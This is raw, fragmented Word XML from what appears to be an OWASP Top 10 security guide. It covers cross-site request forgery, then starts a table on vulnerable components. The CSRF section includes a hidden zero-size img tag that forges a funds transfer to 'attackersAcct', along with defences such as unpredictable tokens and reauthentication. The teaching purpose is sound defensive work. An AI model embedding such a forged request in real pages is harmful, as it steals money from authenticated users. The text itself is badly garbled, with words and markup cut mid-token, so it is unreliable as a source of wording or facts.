    <w:p w14:paraId="2182BFEF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3009E8E0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0737AF6F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E51ED2E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2804FA95" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620DE18C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49929346" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1728AEFC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CSRF?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDC920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e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nks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9805C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m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a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predict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SR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ken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</w:p>
    <w:p w14:paraId="0CADF196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oke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liciou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s.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> 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ternate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819C8C2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efen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tend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603775F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ubm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i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roug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authenticatio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me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB58D79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o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a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(e.g.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PTCHA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320147C1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ocu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nk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m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vok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ate-changing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A870F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unction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n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o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porta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SR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rgets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C4362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ou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e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ultiste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ansaction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</w:p>
    <w:p w14:paraId="1801E709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herent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mun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asi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</w:p>
    <w:p w14:paraId="1C09155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reques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ultip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g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ossib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JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238498FA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No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ss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oki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ur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ddress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ther</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED77A7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form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omatic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row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n’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vide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21140A6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fen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gain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SR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n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form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so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0B963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nclud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g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s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034D0E1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="25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OWASP’s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CSRF Test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o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el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gener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053DE6EA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emonstr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ang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SR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laws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D041B4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A755C0F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="470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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035991EB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ow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bm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anging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F93CE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requ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clu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th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cret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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0815F87E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http://example.com/app/transferFunds?amount=1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEAA528" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199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&amp;destinationAccount=4673243243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCECFE4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="32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o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struc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ansf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oney</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A27EF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ro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ictim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ount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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAAC7F4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embe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a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ram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or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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5A419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variou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d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trol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D351F5C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&lt;img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src="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="C00000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://example.com/app/transferFunds?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A00E2D1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="C00000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>amount=1500&amp;destinationAccount=attackersAcct#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“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A2FF6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width="0"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height="0"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b/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DEC783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icti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isi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i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ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198A996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uthentic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ample.com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g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ll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE8D6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utomatic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clu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ss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fo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oriz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4B744F56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ttacker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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48146DAF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52C0AB70" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447DD1DC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E8CD86" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63215708" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1114C771" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6534055A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BE3C98" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78274019" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D2F7B8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C761266" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58ACDAF9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A596F79" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5416802C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4004B4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79015CBB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444F6F24" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36677FA3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B985599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CSRF?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E18B010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Prevent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SR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ual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clus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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74273BB6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unpredictabl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ke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a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TT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est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u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kens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202AB685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should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inimum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niqu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ssion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A8DA78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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  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preferre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ptio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i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includ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niqu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oke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i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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D1F260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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hidde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field.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i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causes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valu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o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b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sent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in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the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23232"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424C4356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TT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est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void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clus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RL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C01AC1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whi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o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n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xposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECF0FCB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="322" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  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niqu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oke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a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ls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b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include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i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RL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itself,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089DA2A3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R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arameter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owever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u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laceme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u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</w:p>
    <w:p w14:paraId="22750110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greate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risk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a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RL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will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b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expose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ttacker,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB67EFA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thu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promis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cre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ken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D32378D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OWASP’s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CSRF Guar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a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utomatical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clud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u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kens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A0A71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Jav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E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.NET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H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pps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WASP’s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ESAPI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cludes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF724F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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>method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developer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ca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s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o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reven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CSRF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vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679111B2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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Requiring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se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reauthenticate,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prov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y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r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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4360C111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use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(e.g.,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via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APTCHA)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a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ls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protec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gains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SRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB7620" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4F985F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="431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079539F9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</w:p>
    <w:p w14:paraId="02DDC78C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4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4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SR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4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</w:p>
    <w:p w14:paraId="113D0148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4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SR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even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e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heet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C66DC35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SRFGuar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-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SR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efens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ool</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="411ABED0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SAPI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ojec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5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om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age</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A16F838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SAPI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HTTPUtilitie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las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with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ntiCSR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okens</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E3D6133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6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uide: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SR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</w:p>
    <w:p w14:paraId="33C6A7BC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SRFTest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-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SR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est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ool</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="671DB8B4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A43B052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11D03F50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7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352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8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58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SRF</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D19ADE9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5D31B948" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="15"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="579DDFE3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="505EEC8A">
          <v:shape id="_x0000_s2343" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:73.9pt;width:570pt;height:231.05pt;z-index:251687424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3C5DE5AF" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1023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447234F3" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="783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6C662EA2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2717ED52" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="50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5BF82EFD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5B2F95B2" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="517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4B8EBC2F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3DD62DD7" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="558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5CA977FB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6C6CC115" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="505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233827DC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2BCE02BA" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="625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9413E57" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="430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570192A7" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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72640507" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="50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0221E11F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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68C6143D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="3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WIDESPREAD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120347ED" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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22EAF876" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="4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IFFICULT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2B4A8489" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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64CB420D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="42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4B1D519" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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1548FAE6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2E637F4D" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="2373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94B63C1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ulnerable</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7C3E8FD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onen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(e.g.,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="07213C2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amewor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ibraries)</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="210E0A46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dentified</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="32ACF24D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loi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ith</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2FD849C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utoma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ols,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1792BD39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and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7371DF16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re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gen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ool</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="728855B6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yo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rgeted</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="734D17BB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e</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6F94616F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haotic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tor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A6ACCF2" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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dentifi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5E452FD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a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onent</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1F4A03DC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roug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cann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</w:p>
                      <w:p w14:paraId="7582C8D7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u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alysi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e</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="355FC99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ustomiz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36C60F8F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plo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eeded</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="674FA907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xecut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761467B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e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re</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="07DB4F6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fficul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d</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0381717E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onen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ep</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="17EBB12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7F84930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rtual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ver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se</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1B1C815E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su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cau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velopmen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eams</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2F9BBF34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n’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cu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nsur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ir</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0502EF62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onents/librari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p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e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</w:p>
                      <w:p w14:paraId="5CA62CA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se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velop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n’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ven</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6E0B3F3B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know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onen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ing,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4085A85B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nev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i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ersions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onent</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="62987084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pendenci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k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ng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orse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D216068" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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an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547C313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akness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</w:p>
                      <w:p w14:paraId="3B784CF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ossible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cluding</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="112C841C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jection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roken</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="73D4CF61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trol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XSS,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4624B8B2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tc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mpact</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="09CE5344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an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om</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4B5D1FE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nim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4E9EF18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le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ost</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="42A5DDB4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keov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ata</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="70372BA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romise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F92FA78" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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ch</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="149F7BAD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ulnerabilit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ight</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="45586A86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e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6BFB65E0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trolled</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2680425B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ffected</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="217E59D4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</w:p>
                      <w:p w14:paraId="0748D969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ivi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</w:p>
                      <w:p w14:paraId="10C937E3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e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lete</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1271AF6C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mpromise.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="3A17883C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64A53A28">
          <v:shape id="imagerId582" o:spid="_x0000_s2342" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251783680;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId582" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="31B4EA12">
          <v:shape id="imagerId583" o:spid="_x0000_s2341" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251782656;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId583" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="048490B4">
          <v:shape id="imagerId584" o:spid="_x0000_s2340" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251781632;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId584" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6CB00CE6">
          <v:shape id="imagerId585" o:spid="_x0000_s2339" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251776512;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId585" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="38EBC6A5">
          <v:shape id="imagerId586" o:spid="_x0000_s2338" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251775488;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId586" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="483081C8">
          <v:shape id="imagerId587" o:spid="_x0000_s2337" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251780608;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId587" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="07EFA755">
          <v:shape id="imagerId588" o:spid="_x0000_s2336" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251779584;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId588" o:title=""/>
